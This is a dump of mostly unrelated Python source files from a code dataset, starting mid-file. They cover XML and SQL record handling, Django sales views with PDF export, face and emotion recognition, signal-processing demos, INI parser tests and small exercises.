t\n result = self.intersect(result, self.index[head].postings)\n t = tail\n return result\n\n @staticmethod\n def insert(item: DocId, postings: Postings):\n idx = bisect_left(postings.postings, item)\n postings.postings.insert(idx, item)\n postings.doc_count += 1\n","sub_path":"code-python/lecture01/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"362782302","text":"# 用来处理数据的层\nimport xml.etree.ElementTree as ET\ndef indent(elem, level=0):\n i = \"\\n\" + level * \"\\t\"\n # 如果有子节点\n if len(elem):\n # 如果element里面text为空,或者只有空格\n if elem.text is None or elem.text.isspace():\n elem.text = i + \"\\t\"\n # 如果element尾部没有内容\n if elem.tail is None or elem.tail.isspace():\n elem.tail = i\n # 如果是最外层的,尾部就不必有格式了\n if level == 0:\n elem.tail = \"\"\n # 对里面的每一个节点都执行这样的缩进\n for elem in elem:\n indent(elem, level + 1)\n # 执行完了之后,此时的elem是当前父节点的最后一个子节点,由于每个子节点之后都会是/n+/t的缩进,所以最后一个节点的tail = /n+/t\n # 注意,调用完了indent(elem,level + 1)之后,会回到这一行,此时level为0,element为最后一个子节点,i为/n\n # print(elem,repr(i)) # '\\n'\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n # 如果没有子节点\n else:\n if level and (elem.tail is None or elem.tail.isspace()):\n elem.tail = i\n elem.text = elem.text.strip()\n\nclass Operator:\n @staticmethod\n def verify(ID):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.iter('student'):\n if student.get('id') == ID:\n return True\n else:\n pass\n\n @staticmethod\n def get(ID):\n temp = []\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.iter('student'):\n if student.get('id') == ID:\n for item in student:\n temp.append(item.text)\n return temp\n\n @staticmethod\n def delete(ID):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.findall('student'):\n if student.get('id') == ID:\n root.remove(student)\n indent(root)\n tree.write('../data.xml', encoding='utf-8')\n\n @staticmethod\n def increase(ID, time, name, sex, grade):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n student_id = ET.Element('student')\n student_id.set('id', ID)\n stu_time = ET.Element('time')\n stu_time.text = time\n stu_name = ET.Element('name')\n stu_name.text = name\n stu_sex = ET.Element('sex')\n stu_sex.text = sex\n stu_grade = ET.Element('grade')\n stu_grade.text = grade\n root.append(student_id)\n student_id.extend((stu_time, stu_name, stu_sex, stu_grade))\n indent(root)\n tree.write('../data.xml', encoding='UTF-8')\n\n @staticmethod\n def modify(ID, item, comment):\n tree = ET.parse('../data.xml')\n root = tree.getroot()\n for student in root.findall('student'):\n if student.get('id') == ID:\n temp = student.find(item)\n temp.text = comment\n indent(root)\n tree.write('../data.xml', encoding='UTF-8')\n\nif __name__ == '__main__':\n a = Operator()\n results = a.get('001')\n print(results)\n a.modify('002', 'time', '2016')\n a.modify('002', 'grade', '99')\n print(a.verify('002'))\n print(a.get('002'))\n a.increase('003', '2016', '张三', '女', '98')\n a.delete('003')","sub_path":"学生管理系统/model/Operator.py","file_name":"Operator.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126792810","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Column, Integer, ForeignKey, Table, String, Date, UniqueConstraint\nfrom models.base_model import Base\n\nstudent_subject_links = Table('student_subject', Base.metadata,\n Column('id_student', Integer, ForeignKey('student.id', ondelete=\"CASCADE\")),\n Column('id_subject', Integer, ForeignKey('subject.id', ondelete=\"CASCADE\")),\n UniqueConstraint('id_student', 'id_subject', name='unique_student_subject')\n )\n\n\nclass Student(Base):\n __tablename__ = 'student'\n id = Column(Integer, primary_key=True)\n first_name = Column(String)\n last_name = Column(String)\n sex = Column(String)\n date_of_birth = Column(Date)\n id_group = Column(Integer, ForeignKey('group.id', ondelete=\"CASCADE\"))\n\n def __init__(self, id, first_name, last_name, sex, date_of_birth, id_group):\n self.id = id\n self.first_name = first_name\n self.last_name = last_name\n self.sex = sex\n self.date_of_birth = date_of_birth\n self.id_group = id_group\n\n def __repr__(self):\n return \"\" \\\n .format(self.id, self.first_name, self.last_name, self.sex, self.date_of_birth, self.id_group)\n","sub_path":"lab3/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245773915","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom io import BytesIO\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nimport json\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom sales.models import Sale_to_customers,Sale_to_customers_detail\nfrom users.models import Users\nfrom sales.serializers import Sale_to_customersSerializers,Sale_to_customers_detailSerializers\nfrom users.serializers import UsersSerializers\nfrom rest_framework import status\nfrom django.db.models import Q\n#from django.core.urlresolvers import resolve\n\n\n\nclass AddSalesOrder(APIView):\n def post(self,request):\n salesDetails = request.data\n serializer=Sale_to_customersSerializers(data=request.data)\n print(serializer)\n if serializer.is_valid():\n serializer.save()\n sales_id=serializer.data['id']\n if \"data_detail\" not in request.data:\n dict = {'massage': 'Image uploaded successfully ', 'status': True, 'data': {'sales_id':sales_id}}\n else:\n sales_id=serializer.data['id']\n if sales_id:\n for data in request.data['data_detail']:\n data['sales_id']=sales_id\n serializer = Sale_to_customers_detailSerializers(data=data)\n if serializer.is_valid():\n serializer.save()\n dict = {'massage': 'Record inserted successfully ', 'status': True, 'data': {'sales_id':data['sales_id']}}\n else:\n dict = {'massage': 'Record not updated ', 'status': False, 'data': serializer.errors}\n return Response(dict, status=status.HTTP_200_OK)\n else:\n dict = {'massage': 'Record not updated ', 'status': False, 'data': serializer.errors}\n else:\n dict = {'massage': 'Record not updated ', 'status': False, 'data': serializer.errors}\n return Response(dict,status=status.HTTP_200_OK)\n\n\nclass getLastdate(APIView):\n def post(self, request):\n distributer_id = request.data['distributer_id']\n t = request.data['type']\n if t== 'distributer':\n check=Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').first()\n if check:\n lastrecord = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').last()\n serializer = Sale_to_customersSerializers(lastrecord)\n else:\n dic = {}\n dict = {'massage': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n else:\n #print('else')\n check=Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).first()\n if check:\n lastrecord = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).last()\n serializer = Sale_to_customersSerializers(lastrecord)\n else:\n dic = {}\n dict = {'massage': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n\n\n dic ={}\n if serializer.data:\n dic['distributer_id'] = serializer.data['distributer_id']\n dic['id'] = serializer.data['id']\n sid = serializer.data['id']\n dic['start_date'] = serializer.data['start_date']\n dic['end_date'] = serializer.data['end_date']\n dic['image'] = serializer.data['image']\n dic['type'] = serializer.data['type']\n lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id','product_id','catalog_code','qty')\n serializer = Sale_to_customers_detailSerializers(lastrecordsdetail,many=True)\n #print(serializer.data)\n dic['detail'] = serializer.data\n if dic:\n dict = {'massage': 'data found', 'status': True, 'data':dic}\n else:\n dict = {'massage': 'data not found', 'status': False, 'data': dic}\n else:\n dict = {'massage': 'data not found', 'status': False, 'data': dic}\n return Response(dict, status=status.HTTP_200_OK)\n\nclass gethistory(APIView):\n def post(self, request):\n distributer_id=request.data['distributer_id']\n type=request.data['type']\n month=request.data['month']\n year=request.data['year']\n dic={}\n if type == 'distributer':\n salesdetail = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(type='distributer').filter(Q(Q(start_date__year=year) & Q(start_date__month=month)) | (Q(end_date__year=year) & Q(end_date__month=month)))\n else:\n salesdetail = Sale_to_customers.objects.filter(distributer_id=distributer_id).filter(~Q(type='distributer')).filter(Q(Q(start_date__year=year) & Q(start_date__month=month)) | ( Q(end_date__year=year) & Q(end_date__month=month)))\n #print(salesdetail.query)\n serializer = Sale_to_customersSerializers(salesdetail,many=True)\n dic = serializer.data\n if dic:\n dict = {'massage': 'data found', 'status': True, 'data': dic}\n else:\n dict = {'massage': 'data not found', 'status': False, 'data': dic}\n\n return Response(dict, status=status.HTTP_200_OK)\n\n def get(self, request):\n sid = request.GET[\"id\"]\n #print(sid)\n #lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id', 'product_id','catalog_code', 'qty')\n\n lastrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid)\n serializer = Sale_to_customers_detailSerializers(lastrecordsdetail, many=True)\n if serializer.data:\n dict = {'massage': 'data found', 'status': True, 'data': serializer.data}\n else:\n dict = {'massage': 'data not found', 'status': False, 'data': serializer.data}\n return Response(dict, status=status.HTTP_200_OK)\n\n\nclass getsalespdf(APIView):\n def get(self,request, *args, **kwargs):\n sid = request.GET[\"sales_id\"]\n salesrecords = Sale_to_customers.objects.filter(id=sid)\n serializer = Sale_to_customersSerializers(salesrecords,many=True)\n dic = {}\n dic1 = serializer.data[0]\n distributer_id = dic1['distributer_id']\n #print(distributer_id)\n users = Users.objects.filter(id=distributer_id)\n serializer = UsersSerializers(users,many=True)\n customer_name = serializer.data[0]['customer_name']\n\n salesrecordsdetail = Sale_to_customers_detail.objects.filter(sales_id=sid).values('id', 'product_id','catalog_code', 'qty')\n serializer = Sale_to_customers_detailSerializers(salesrecordsdetail, many=True)\n\n dic2 = serializer.data\n data = {}\n data['sales']=dic1\n data['salesdetail'] = dic2\n data['distributer_name'] = customer_name\n ''' Create pdf and save'''\n filename = 'sales_'+sid+'.pdf'\n template = get_template('sales.html')\n html = template.render(data)\n result = BytesIO()\n file = open(\"uploadimages/pdf/\"+filename, \"w+b\")\n #current_url = request.path_info\n #print(current_url)\n pisaStatus = pisa.CreatePDF(html.encode('utf-8'), dest=file, encoding='utf-8')\n dict = {'massage': 'data found', 'status': True, 'data': 'uploadimages/pdf/'+filename }\n return Response(dict, status=status.HTTP_200_OK)\n","sub_path":"dj_safedecor/safedecor/sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330620849","text":"import nibabel as nib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimg = nib.load('ds114_sub009_t2r1.nii')\ndata = img.get_data()\nstdVals = []\nJ = data.shape[3]\nfor i in range(1, J):\n\tcurr_vol = data[:,:,:,i]\n\tcurr_stdVal = np.std(curr_vol)\n\tstdVals.append(curr_stdVal)\n","sub_path":"std_test.py","file_name":"std_test.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208259096","text":"import sqlalchemy as sa\n\nfrom .base import metadata\n\nprojects_snapshots = sa.Table(\n \"projects_snapshots\",\n metadata,\n sa.Column(\n \"id\",\n sa.BigInteger,\n nullable=False,\n primary_key=True,\n doc=\"Global snapshot identifier index\",\n ),\n sa.Column(\"name\", sa.String, nullable=False, doc=\"Display name\"),\n sa.Column(\n \"created_at\",\n sa.DateTime(),\n nullable=False,\n doc=\"Timestamp for this snapshot.\"\n \"It corresponds to the last_change_date of the parent project \"\n \"at the time the snapshot was taken.\",\n ),\n sa.Column(\n \"parent_uuid\",\n sa.String,\n sa.ForeignKey(\n \"projects.uuid\",\n name=\"fk_snapshots_parent_uuid_projects\",\n ondelete=\"CASCADE\",\n ),\n nullable=False,\n unique=False,\n doc=\"UUID of the parent project\",\n ),\n sa.Column(\n \"project_uuid\",\n sa.String,\n sa.ForeignKey(\n \"projects.uuid\",\n name=\"fk_snapshots_project_uuid_projects\",\n ondelete=\"CASCADE\",\n ),\n nullable=False,\n unique=True,\n doc=\"UUID of the project associated to this snapshot\",\n ),\n sa.Column(\"deleted\", sa.Boolean(), default=False),\n sa.UniqueConstraint(\n \"parent_uuid\", \"created_at\", name=\"snapshot_from_project_uniqueness\"\n ),\n)\n","sub_path":"packages/postgres-database/src/simcore_postgres_database/models/projects_snapshots.py","file_name":"projects_snapshots.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39807215","text":"import kero.multib.NeuralNetwork as nn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nAF = nn.activationFunction(func = \"Sigmoid\")\nx = np.linspace(-4,4,100)\ny = [AF.af(X) for X in x]\ndydx = [AF.afp(X) for X in x]\n\nfig1 = plt.figure()\nax=fig1.add_subplot(111)\nax.scatter(x,y,3,label=\"sigmoid\")\nax.scatter(x,dydx,3,label=\"sigmoid derivative\")\nax.legend()\nplt.show()","sub_path":"test runs/0.6.1 tests/testActf1.py","file_name":"testActf1.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"520068331","text":"\"\"\"\n10000 이하 자연수 2개(a, b) -> 최대공약수, 최소공배수\n최대공약수 <- GCD(a, b)\n최소공배수 <- a * b / GCD(a, b)\n\ngcd: 유클리드 알고리즘\n\"\"\"\n\nimport sys\nreadline = lambda: sys.stdin.readline().rstrip()\n\ndef gcd(a, b):\n if b == 0:\n return a\n\n else:\n if b > a:\n a, b = b, a\n \n return gcd(b, a % b)\n\n\ndef lcm(a, b):\n return int(a * b / gcd(a, b))\n\n\nif __name__ == '__main__':\n a, b = map(int, readline().split())\n print(gcd(a, b))\n print(lcm(a, b))","sub_path":"baekjoonOJ/2609/2609.py","file_name":"2609.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"495736544","text":"#!/usr/bin/env python3\n\ncat_matrices2D = __import__('7-gettin_cozy').cat_matrices2D\nimport numpy as np \n\ndef cat_matrices2D(mat1, mat2, axis=0):\n if (len(mat1[0]) == len(mat2[0])) and axis == 0:\n new_mat=np.concatenate((mat1,mat2),axis=0)\n return new_mat.tolist()\n elif (len(mat1) == len(mat2)) and axis == 1:\n new_mat=np.concatenate((mat1,mat2),axis=1)\n return new_mat.tolist()\n else:\n return None\nmat1 = [[1, 2], [3, 4]]\nmat2 = [[5, 6]]\nmat3 = [[7], [8]]\nmat4 = cat_matrices2D(mat1, mat2)\nmat5 = cat_matrices2D(mat1, mat3, axis=1)\nprint(mat4)\nprint(mat5)\nmat1[0] = [9, 10]\nmat1[1].append(5)\nprint(mat1)\nprint(mat4)\nprint(mat5)","sub_path":"7-gettin_cozy.py","file_name":"7-gettin_cozy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"69963176","text":"\"\"\"\nContinuous wavelet transform.\n\nPerforms a continuous wavelet transform on data, using the wavelet function. \nA CWT performs a convolution with data using the wavelet function, which is \ncharacterized by a width parameter and length parameter.\n\"\"\"\n\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(-1, 1, 200, endpoint=False)\nsig = np.cos(2 * np.pi * 7 * t) + signal.gausspulse(t - 0.4, fc=2)\nwidths = np.arange(1, 31)\ncwtmatr = signal.cwt(sig, signal.ricker, widths)\nplt.imshow(cwtmatr, extent=[-1, 1, 31, 1], cmap='PRGn', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.show()","sub_path":"signal_processing/wavelets/continuous_wavelet_transform.py","file_name":"continuous_wavelet_transform.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"65296139","text":"from models import Member, Post\nimport stores\n\n\nmember1 = Member(\"Ahmad\", 23)\n\nmember2 = Member(\"Samer\", 29)\n\nm_store = stores.MemberStore()\n\nm_store.add(member1)\n\nm_store.add(member2)\n\npost1 = Post(\"Post1\", \"This is the first post\")\n\npost2 = Post(\"Post2\", \"This is the second post\")\n\npost3 = Post(\"Post3\", \"This is the third post\")\n\np_store = stores.PostStore()\n\np_store.add(post1)\n\np_store.add(post2)\n\np_store.add(post3)\n\n\nprint(\"***** Forum Summary *****\")\n\nprint(\"\\n***** Members *****\\n\")\n\nfor member in m_store.get_all():\n\n print(member)\n\nprint(\"\\n***** Posts *****\\n\")\n\nfor post in p_store.get_all():\n\n print(post)\n\nprint(m_store.entity_exists(member1))\n\nprint(p_store.entity_exists(post3))\n\nprint(m_store.entity_exists(Member(\"test\", \"0\")))\n\nm_store.delete(10)\n\np_store.delete(2)\n\nprint(\"\\n***** Posts *****\\n\")\n\nfor post in p_store.get_all():\n\n print(post)","sub_path":"Forums/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"611584855","text":"import edms.iniformat.reader\nimport edms.iniformat.writer\nimport unittest\nimport os\n\nclass TestIniFileWriter(unittest.TestCase):\n def setUp(self):\n self.write_path = 'writesample1.ini'\n try:\n os.remove(self.write_path)\n except OSError:\n pass\n self.sample1_dict = {'first_section':\n {'coffee':'even more love',\n 'beer':'funny things can happen',\n 'currently_working_on_the_project':'true'\n },\n 'second_section':\n {'parameter': 'on',\n 'rabbit': 'animal',\n 'my_path':'tmp/edms/samples'\n }\n }\n\n\n def tearDown(self):\n os.remove(self.write_path)\n\n def test_writing_dict_to_ini_file(self):\n edms.iniformat.writer.write_ini_file(self.write_path, self.sample1_dict)\n self.assertEquals(edms.iniformat.reader.read_ini_file(self.write_path), self.sample1_dict)\n\n\n\nclass TestIniFileReader(unittest.TestCase):\n def setUp(self):\n self.sample1_dict = {'first_section':\n {'coffee':'love',\n 'beer':'fun',\n 'currently_working_on_the_project':'true'\n },\n 'second_section':\n {'parameter': 'off',\n 'rabbit': 'animal',\n 'my_path':'tmp/edms/samples'\n }\n }\n\n def test_reading_sample1(self):\n self.assertEquals(edms.iniformat.reader.read_ini_file('sample1.ini'), self.sample1_dict)\n\n def test_reading_invalid_sample2(self):\n with self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample2.ini')\n\n def test_duplicate_section_name(self):\n with self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample3.ini')\n\n def test_duplicate_property_name(self):\n with self.assertRaises(ValueError):\n edms.iniformat.reader.read_ini_file('sample4.ini')","sub_path":"edms/tests/test_iniformat.py","file_name":"test_iniformat.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"240986169","text":"from keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport numpy as np\nimport face_recognition\nimport dlib\nfrom imutils import face_utils\n\n####### Initialize faces for facial recognition #######\nimgSam = face_recognition.load_image_file('faces/Sam.png')\nimgSamEncoding = face_recognition.face_encodings(imgSam)[0]\n\nimgTrev = face_recognition.load_image_file('faces/Trev.png')\nimgTrevEncoding = face_recognition.face_encodings(imgTrev)[0]\n\nimgNabil = face_recognition.load_image_file('faces/Nabil.png')\nimgNabilEncoding = face_recognition.face_encodings(imgNabil)[0]\n\nimgSunghoRoh = face_recognition.load_image_file('faces/Sungho_Roh.png')\nimgSunghoRohEncoding = face_recognition.face_encodings(imgSunghoRoh)[0]\n\nimgPark = face_recognition.load_image_file('faces/Park.png')\nimgParkEncoding = face_recognition.face_encodings(imgPark)[0]\n\nimgAntonio = face_recognition.load_image_file('faces/Antonio.png')\nimgAntonioEncoding = face_recognition.face_encodings(imgAntonio)[0]\n\nimgKim = face_recognition.load_image_file('faces/Kim.png')\nimgKimEncoding = face_recognition.face_encodings(imgKim)[0]\n\nimgLee = face_recognition.load_image_file('faces/Lee.png')\nimgLeeEncoding = face_recognition.face_encodings(imgLee)[0]\n\nlearnedFaceEncodings = [imgSamEncoding, imgNabilEncoding, imgSunghoRohEncoding, imgParkEncoding,\n imgAntonioEncoding, imgKimEncoding]\nlearnedFaceNames = ['Sam', 'Trevor', 'Nabil', 'Sungho Roh', 'Park', 'Antonio', 'Kim']\n# End face initialization\n\n# set local or full pathname for the haarcascades and vgg.h5 files\nface_classifier = cv2.CascadeClassifier(\n '/Users/samlindaman/PycharmProjects/Emotion/haarcascade_frontalface_default.xml')\nclassifier = load_model('/Users/samlindaman/PycharmProjects/Emotion/Emotion_little_vgg.h5')\n\nclass_labels = ['Angry', 'Happy', 'Neutral', 'Sad', 'Surprise']\ncap = cv2.VideoCapture(0)\n\n# set variable for falling check\narrHeights = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ncount = 0\nfallenText = \"FALLEN\"\nfallen = False\n#\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfont2 = cv2.QT_FONT_NORMAL\nexitText = 'Press \"q\" to exit.'\n\nwhile True:\n # Grab a single frame of video\n ret, frame = cap.read()\n labels = []\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n face_locations = face_recognition.face_locations(frame)\n face_encodings = face_recognition.face_encodings(frame, face_locations)\n\n for (x, y, w, h) in faces:\n\n # Falling check\n arrHeights.append(y) # append array of y coordinates for each face\n size = len(arrHeights)\n\n # loop through the last 10 x coordinates to check for downward trend\n for s in range(size - 11, size - 1):\n if arrHeights[s] > arrHeights[s - 1]:\n count = count + 1\n else:\n count = 0\n fallen = False\n # if user comes back into screen, the fallen message should disappear\n\n # make sure that the fall is large/fast enough and the user wan't just moving their head downward\n if count >= 6 and arrHeights[s] - arrHeights[s - 5] >= 175:\n fallen = True\n break\n\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n matches = face_recognition.compare_faces(learnedFaceEncodings, face_encoding)\n name = 'User'\n if True in matches:\n first_match_index = matches.index(True)\n name = learnedFaceNames[first_match_index]\n cv2.putText(frame, 'Admin: ' + name, (left + 2, top - 100), font, 1, (255, 255, 255), 3)\n else:\n cv2.putText(frame, name, (left + 2, top - 100), font, 1, (255, 255, 255), 3)\n\n # draw rectangle\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_gray = cv2.resize(roi_gray, (48, 48), interpolation=cv2.INTER_AREA)\n # rect,face,image = face_detector(frame)\n\n if np.sum([roi_gray]) != 0:\n roi = roi_gray.astype('float') / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # make a prediction on the ROI, then lookup the class\n\n preds = classifier.predict(roi)[0]\n label = class_labels[preds.argmax()]\n label_position = (x, y - 10)\n cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 3)\n else:\n cv2.putText(frame, 'No Face Found', (20, 60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\n\n if fallen:\n cv2.putText(frame, fallenText, (20, 60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4)\n\n cv2.putText(frame, exitText, (1000, 30), font2, .75, (255, 255, 255), 1)\n cv2.imshow('Emotion Detector', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n","sub_path":"Emotion_Detection/Emotion_Detection.py","file_name":"Emotion_Detection.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"27752555","text":"\"\"\"Tests for utils in store\"\"\"\nfrom cg.store.models import FamilySample\nfrom cg.store.utils import get_links, get_samples\n\n\ndef test_get_samples(analysis_obj):\n \"\"\"Test function to get all samples from a analysis object\"\"\"\n # GIVEN an analysis object\n # WHEN fetching all samples\n samples = get_samples(analysis_obj)\n # THEN assert the samples are FamilySamples\n for sample in samples:\n assert isinstance(sample, FamilySample)\n\n\ndef test_link(family_obj):\n \"\"\"Test function to get all samples from a family\"\"\"\n # GIVEN an family object\n # WHEN fetching all links\n link_objs = get_links(family_obj)\n # THEN assert the link objs are samples\n for link_obj in link_objs:\n assert isinstance(link_obj, FamilySample)\n","sub_path":"tests/store/test_store_utils.py","file_name":"test_store_utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"22822048","text":"from argparse import ArgumentParser\n\n\ndef get_arguments():\n parser = ArgumentParser(description='Sample Flask Application')\n\n parser.add_argument('-e', '--environment', type=str,\n default=\"dev\", choices=[\"dev\", \"stg\", \"prod\"])\n parser.add_argument('-p', '--port', type=int,\n choices=range(1024, 49150), default=5000)\n\n return parser.parse_args()\n","sub_path":"src/config/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"631663812","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'orders'\n\nurlpatterns = [\n url(r'^add_order/$', views.add_order, name=\"add_order\"),\n url(r'^modify_order/$', views.modify_order, name=\"modify\"),\n url(r'^(?P[0-9]+)/$', views.order_details, name=\"detail\"),\n url(r'^$', views.list_orders, name=\"list\"),\n]\n","sub_path":"Assign2/assign2/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"587405636","text":"# -*- coding: utf-8 -*-\n\ndef somalinha(a):\n soma=0\n for i in range(0,a.shape[0],1):\n for j in range(0,a.shape[1],1):\n soma=soma+a[i,j]\n return(soma)\n \ndef somacoluna(a):\n soma=0\n for j in range(0,a.shape[1],1):\n for i in range(0,a.shape[0],1):\n soma=soma+a[i,j]\n return(soma)\n \ndef somadiagonal1(a):\n soma=0\n for i in range(0,a.shape[0],1):\n for j in range(0,a.shape[1],1):\n if i==j:\n soma=soma+a[i,j]\n return(soma) \n\ndef somadiagonal2(a):\n soma=0 \n i=0\n n=(a.shape[1])-1\n while i None:\n self.path = path\n self.points = path.points\n self.index = 0\n\n def draw_path(self, convas, frame_idx: int, ts):\n convas = plot_utils.draw_line_string(convas, self.points[self.index:], color.GREEN)\n if frame_idx >= self.path.first_frame and frame_idx <= self.path.last_frame:\n convas = plot_utils.draw_line_string(convas, self.points[0:self.index+1], color.RED, 3)\n \n pt = self.points[self.index]\n convas = cv2.circle(convas, pt.xy.astype(int), 7, color.RED, thickness=-1, lineType=cv2.LINE_AA)\n convas = plot_utils.draw_label(convas, str(self.path.luid), pt.xy.astype(int), color.BLACK, color.RED, 4)\n\n self.index += 1\n elif frame_idx > self.path.last_frame:\n last_pt = self.points[-1]\n convas = cv2.circle(convas, last_pt.xy.astype(int), 5, color.RED,\n thickness=-1, lineType=cv2.LINE_AA)\n convas = plot_utils.draw_label(convas, str(self.path.luid), last_pt.xy.astype(int),\n color.BLACK, color.RED, 3)\n\n return convas\n\nclass LocalPathDisplayProcessor(ImageProcessor):\n def __init__(self, capture: ImageCapture, paths: List[LocalPath], output_video: Path=None) -> None:\n super().__init__(capture, window_name='output', output_video=output_video,\n show_progress=False, stop_at_the_last=True)\n\n self.draws = [LocalPathDraw(path) for path in paths]\n\n def process_image(self, convas, frame_idx: int, ts):\n for draw in self.draws:\n convas = draw.draw_path(convas, frame_idx, ts)\n return convas\n\n\nimport sys\nimport argparse\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Replay a localpath on the screen\")\n parser.add_argument(\"node\", metavar='node_id', help=\"target node_id\")\n parser.add_argument(\"--conf\", help=\"DNA framework configuration\", default=DNA_CONIFIG_FILE)\n parser.add_argument(\"--no_sync\", help=\"do not sync to fps\", action=\"store_true\")\n parser.add_argument(\"--id\", type=int, nargs='+', help=\"target object id\")\n\n parser.add_argument(\"--output_video\", metavar=\"file\", help=\"output video file\", required=False)\n return parser.parse_known_args()\n\nif __name__ == '__main__':\n args, unknown = parse_args()\n\n conf = load_config(DNA_CONIFIG_FILE, args.node)\n config_grp = parse_config_args(unknown)\n\n camera_info = Camera.from_conf(conf.camera)\n\n platform = DNAPlatform.load_from_config(conf.platform)\n rset = platform.get_resource_set(\"local_paths\")\n\n lpaths = []\n first_frame = sys.maxsize * 2 + 1\n last_frame = 0\n for id in args.id:\n lpath = rset.get((camera_info.camera_id, id))\n if lpath:\n first_frame = min(first_frame, lpath.first_frame)\n last_frame = max(last_frame, lpath.last_frame)\n else:\n print(f\"invalid track object: camera_id='{camera_info.camera_id}', id='{args.id}'\", file=sys.stderr)\n exit(-1)\n lpaths.append(lpath)\n print(f\"path: {first_frame} -> {last_frame}\")\n\n begin_frame = max(first_frame - 5, 1)\n end_frame = last_frame\n cap = camera_info.get_capture(sync=not args.no_sync, begin_frame=begin_frame, end_frame=end_frame)\n with LocalPathDisplayProcessor(cap, lpaths,\n output_video=args.output_video) as processor:\n from timeit import default_timer as timer\n from datetime import timedelta\n\n started = timer()\n frame_count = processor.run()\n elapsed = timer() - started\n fps = frame_count / elapsed\n\n print(f\"elapsed_time={timedelta(seconds=elapsed)}, fps={fps:.1f}\" 